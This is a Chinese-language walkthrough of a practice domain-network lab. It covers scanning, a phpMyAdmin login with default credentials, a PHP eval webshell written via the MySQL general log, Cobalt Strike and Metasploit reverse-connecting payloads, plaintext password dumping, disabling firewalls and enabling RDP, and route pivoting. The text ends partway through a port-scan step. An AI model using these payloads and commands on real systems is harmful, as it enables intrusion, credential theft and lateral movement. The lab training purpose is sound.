image-20250402170621917

环境搭建

添加VMnet2网卡,仅主机模式,模拟内网环境。

image-20250402165340806

VM8模拟外网(和kali攻击机在同一网段中)

Windows 7

image-20250402173206081

我的本地已经开启kali虚拟机,在VM8网段中。

测试连通性:

image-20250402173310018

没问题。

接下来手动关闭Win7的防火墙(控制面板-系统与安全),防止我们的kali机子连不到win7。

还有一点需要注意!

image-20250402174715511

把外网网卡的ip改为和kali位于同一网段。(kali在192.168.80.128)

ping通了:

image-20250402174805598

Win7开启web服务:

image-20250402175337719

Win2008 与 Win2K3

配置选择VM2网卡即可。

渗透流程

nmap -sN参数锁定外网网段目标:

image-20250402175444444

探测开放端口:(-p-)

image-20250402175726013

外网打点

访问192.168.80.111的80端口:

image-20250402175820633

这里能看到这个web服务在Windows中的绝对路径:C:/phpStudy/WWW

用dirsearch爆目录,发现有phpmyadmin路由。

随便猜账号密码都是root,没想到真登入进去了:

image-20250402181213978

能登到这个后台,就有很多种办法利用SQL来GetShell了。

准备利用SQL语句来写webshell,因为前面我们已经知晓了web路径。

然而失败了:

image-20250402181914599

接着用写日志的思路:

1
2
3
4
SET GLOBAL general_log = "ON";
SET GLOBAL general_log_file = "C:/phpStudy/WWW/eval.php"
SELECT '<?php @eval($_POST[1]); ?>/*'
//SELECT的内容会被写入日志文件(php后缀)并解析,后面需要加一个/*把脏数据给注释掉。

拿到Shell:

image-20250402182310458

连蚁剑。

image-20250403154754824

内网探测

kali先配置server端CS:

image-20250403154903400

Windows主机用client端连接:

image-20250403155038137

配置监听器,监听的ip写kali的就好

image-20250403155636653

image-20250403155357796

生成Windows回连木马:

image-20250403155703837

从蚁剑中上传至Win7,然后执行,CS-Client端收到回连:

image-20250403155839589

接着可以利用beacon执行命令。

image-20250403155955790

还有很多内网信息还未探测,这里直接用蚁剑即可:

内网信息探测

net view /domain - 探测win7主机处在哪个/哪些域中:

image-20250403160516425

说明目标只有一个域:GOD

net view /domain:GOD - 列出域内的所有机器:

image-20250406143509054

找域控制器主机名:

net group "domain controllers" /domain

image-20250406143813298

域控是那台OWA主机。

CS抓取明文密码

在beacon中使用logonpasswords

image-20250406145910543

RDP远程登录win7

RDP远程桌面协议需要开启3389端口,我们可以用以下方式进行开启:

1
2
3
4
5
6
7
8
9
#注册表开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#添加防火墙规则
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

#关闭防火墙
netsh firewall set opmode disable   			#winsows server 2003 之前
netsh advfirewall set allprofiles state off 	#winsows server 2003 之后

image-20250406150717147

准备利用god域中的管理员身份进行登录。

image-20250406150418377

来到任意一台Windows,搜索远程桌面:

image-20250406150827826

image-20250406150910508

内网渗透

CS派生给MSF

首先,在kali启动MSF,并初始化监听配置:

1
2
3
4
5
6
msfconsole # 启动MSF框架
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost ip
set lport port
exploit

CS中新建一张监听卡:

image-20250406152456684

点击新建会话,选择MSF那张卡,即可。

image-20250406152515334

image-20250406152547348

MSF简单利用

利用post/windows/gather/checkvm模块可以检测目标机器是否是一台虚拟机:

image-20250406152700301

post/windows/gather/enum_applications探测目标机器上的应用程序:

image-20250406152832864

添加路由:

1
2
3
4
5
6
# 可以用模块自动添加路由
run post/multi/manage/autoroute
#添加一条路由
run autoroute -s 192.168.52.0/24
#查看路由添加情况
run autoroute -p

接下来background回到MSF的主控制台,用auxiliary/scanner/portscan/tcp来扫端口: